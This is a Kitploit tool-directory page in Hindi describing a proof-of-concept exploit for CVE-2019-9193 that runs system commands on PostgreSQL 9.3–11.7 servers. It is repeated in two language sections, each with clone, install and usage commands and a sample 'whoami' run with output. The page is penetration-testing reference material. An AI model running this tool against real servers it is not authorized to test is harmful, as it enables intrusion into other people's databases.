Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-9193 — एक PoC उपकरण है जो PostgreSQL के विशिष्ट संस्करणों (9.3 - 11.7) में प्रमाणित रिमोट कोड एक्सेक्यूशन (RCE) भेद्यता का शोषण करने के लिए डिज़ाइन किया गया है। | Kitploit
उपकरण/GitHubGitHub/geniuszly/cve-2019-9193
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHubgeniuszly/cve-2019-9193

CVE-2019-9193

एक PoC उपकरण है जो PostgreSQL के विशिष्ट संस्करणों (9.3 - 11.7) में प्रमाणित रिमोट कोड एक्सेक्यूशन (RCE) भेद्यता का शोषण करने के लिए डिज़ाइन किया गया है।

रिपॉजिटरी देखें
411 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

EN

GenPostgresRCEExploit एक PoC टूल है जिसे PostgreSQL के विशिष्ट संस्करणों (9.3 - 11.7) में एक प्रमाणित रिमोट कोड निष्पादन (RCE) भेद्यता का शोषण करने के लिए डिज़ाइन किया गया है। यह प्रमाणित उपयोगकर्ताओं को CVE-2019-9193 के लिए संवेदनशील PostgreSQL डेटाबेस सर्वर पर सिस्टम कमांड निष्पादित करने की अनुमति देता है।

विशेषताएं

  • RCE का शोषण: एक प्रमाणित PostgreSQL सत्र के माध्यम से सिस्टम कमांड निष्पादित करता है।
  • संस्करण जाँच: भेद्यता की पुष्टि करने के लिए लक्षित PostgreSQL सर्वर के संस्करण को सत्यापित करता है।
  • कमांड निष्पादन: यदि सर्वर संवेदनशील है तो उस पर कस्टम कमांड निष्पादन की अनुमति देता है।
  • स्वचालित तालिका प्रबंधन: मैन्युअल हस्तक्षेप के बिना कमांड निष्पादन के लिए एक अस्थायी तालिका बनाता और हटाता है।

आवश्यकताएं

  • Python 3.x
  • PostgreSQL क्लाइंट लाइब्रेरी (psycopg2 पैकेज)

स्थापना

  1. रिपॉजिटरी क्लोन करें:
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2019-9193
    cd CVE-2019-9193
    
  2. आवश्यक पैकेज स्थापित करें:
    root@kitploit:~
    pip install -r requirements.txt
    

उपयोग

root@kitploit:~
python3 GenPostgresRCEExploit.py -i <target_ip> -p <port> -d <database_name> -U <username> -P <password> -c "<system_command>"

विकल्प

  • -i, --ip: PostgreSQL सर्वर का IP पता (डिफ़ॉल्ट: 127.0.0.1)
  • -p, --port: PostgreSQL सर्वर का पोर्ट (डिफ़ॉल्ट: 5432)
  • -d, --database: PostgreSQL डेटाबेस का नाम (डिफ़ॉल्ट: template1)
  • -U, --user: PostgreSQL सर्वर से कनेक्ट करने के लिए उपयोगकर्ता नाम (डिफ़ॉल्ट: postgres)
  • -P, --password: PostgreSQL सर्वर से कनेक्ट करने के लिए पासवर्ड (डिफ़ॉल्ट: postgres)
  • -c, --command: सर्वर पर निष्पादित की जाने वाली सिस्टम कमांड
  • -t, --timeout: सेकंड में कनेक्शन टाइमआउट (डिफ़ॉल्ट: 10)

उदाहरण

root@kitploit:~
python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"

यह उदाहरण 192.168.1.10 पर PostgreSQL सर्वर से कनेक्ट होता है, दिए गए क्रेडेंशियल्स के साथ प्रमाणीकरण करता है, और whoami कमांड निष्पादित करता है।

उदाहरण आउटपुट

root@kitploit:~
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"

[+] Подключение к базе данных PostgreSQL на 192.168.1.10:5432
[+] Соединение успешно установлено
[+] Проверка версии PostgreSQL
[+] Уязвимая версия PostgreSQL обнаружена: 10.4
[+] Создание временной таблицы: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Команда успешно выполнена

postgres

अस्वीकरण

यह टूल केवल शैक्षिक उद्देश्यों और नैतिक परीक्षण के लिए है। किसी भी प्रणाली के विरुद्ध इस टूल का अनधिकृत उपयोग अवैध है और सख्त रूप से निषिद्ध है। लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।

RU

GenPostgresRCEExploit — यह एक PoC-एक्सप्लॉइट है, जिसे PostgreSQL के विशिष्ट संस्करणों (9.3 - 11.7) में रिमोट कोड निष्पादन (RCE) भेद्यता का शोषण करने के लिए विकसित किया गया है। यह प्रोग्राम प्रमाणित उपयोगकर्ताओं को CVE-2019-9193 के लिए संवेदनशील PostgreSQL सर्वर पर सिस्टम कमांड निष्पादित करने की अनुमति देता है।

विशेषताएं

  • RCE का शोषण: PostgreSQL के साथ प्रमाणित कनेक्शन के माध्यम से सिस्टम कमांड निष्पादित करना।
  • संस्करण जाँच: भेद्यता के लिए लक्षित PostgreSQL सर्वर के संस्करण की जाँच करता है।
  • कमांड निष्पादन: भेद्यता होने पर सर्वर पर मनमानी कमांड निष्पादित करने की अनुमति देता है।
  • तालिका प्रबंधन: कमांड निष्पादित करने के लिए स्वचालित रूप से एक अस्थायी तालिका बनाता और हटाता है।

आवश्यकताएं

  • Python 3.x
  • PostgreSQL क्लाइंट लाइब्रेरी (psycopg2 पैकेज)

स्थापना

  1. रिपॉजिटरी क्लोन करें:
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2019-9193
    cd CVE-2019-9193
    
  2. आवश्यक पैकेज स्थापित करें:
    root@kitploit:~
    pip install -r requirements.txt
    

उपयोग

root@kitploit:~
python3 GenPostgresRCEExploit.py -i <IP-адрес> -p <порт> -d <имя_базы_данных> -U <пользователь> -P <пароль> -c "<системная_команда>"

विकल्प

  • -i, --ip: PostgreSQL सर्वर का IP पता (डिफ़ॉल्ट: 127.0.0.1)
  • -p, --port: PostgreSQL सर्वर का पोर्ट (डिफ़ॉल्ट: 5432)
  • -d, --database: PostgreSQL डेटाबेस का नाम (डिफ़ॉल्ट: template1)
  • -U, --user: PostgreSQL सर्वर से कनेक्ट करने के लिए उपयोगकर्ता नाम (डिफ़ॉल्ट: postgres)
  • -P, --password: PostgreSQL सर्वर से कनेक्ट करने के लिए पासवर्ड (डिफ़ॉल्ट: postgres)
  • -c, --command: सर्वर पर निष्पादित करने के लिए सिस्टम कमांड
  • -t, --timeout: सेकंड में कनेक्शन टाइमआउट (डिफ़ॉल्ट: 10)

उदाहरण

root@kitploit:~
python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"

इस उदाहरण में, प्रोग्राम 192.168.1.10 पते पर PostgreSQL सर्वर से कनेक्ट होता है, निर्दिष्ट डेटा के साथ प्रमाणीकरण करता है, और whoami कमांड निष्पादित करता है।

उदाहरण आउटपुट

root@kitploit:~
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"

[+] Подключение к базе данных PostgreSQL на 192.168.1.10:5432
[+] Соединение успешно установлено
[+] Проверка версии PostgreSQL
[+] Уязвимая версия PostgreSQL обнаружена: 10.4
[+] Создание временной таблицы: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Команда успешно выполнена

postgres

अस्वीकरण

यह टूल केवल शैक्षिक उद्देश्यों और कानूनी परीक्षण के लिए है। किसी भी प्रणाली के विरुद्ध इस टूल का अनधिकृत उपयोग अवैध है और सख्त रूप से निषिद्ध है। लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।

टूल डाउनलोड करें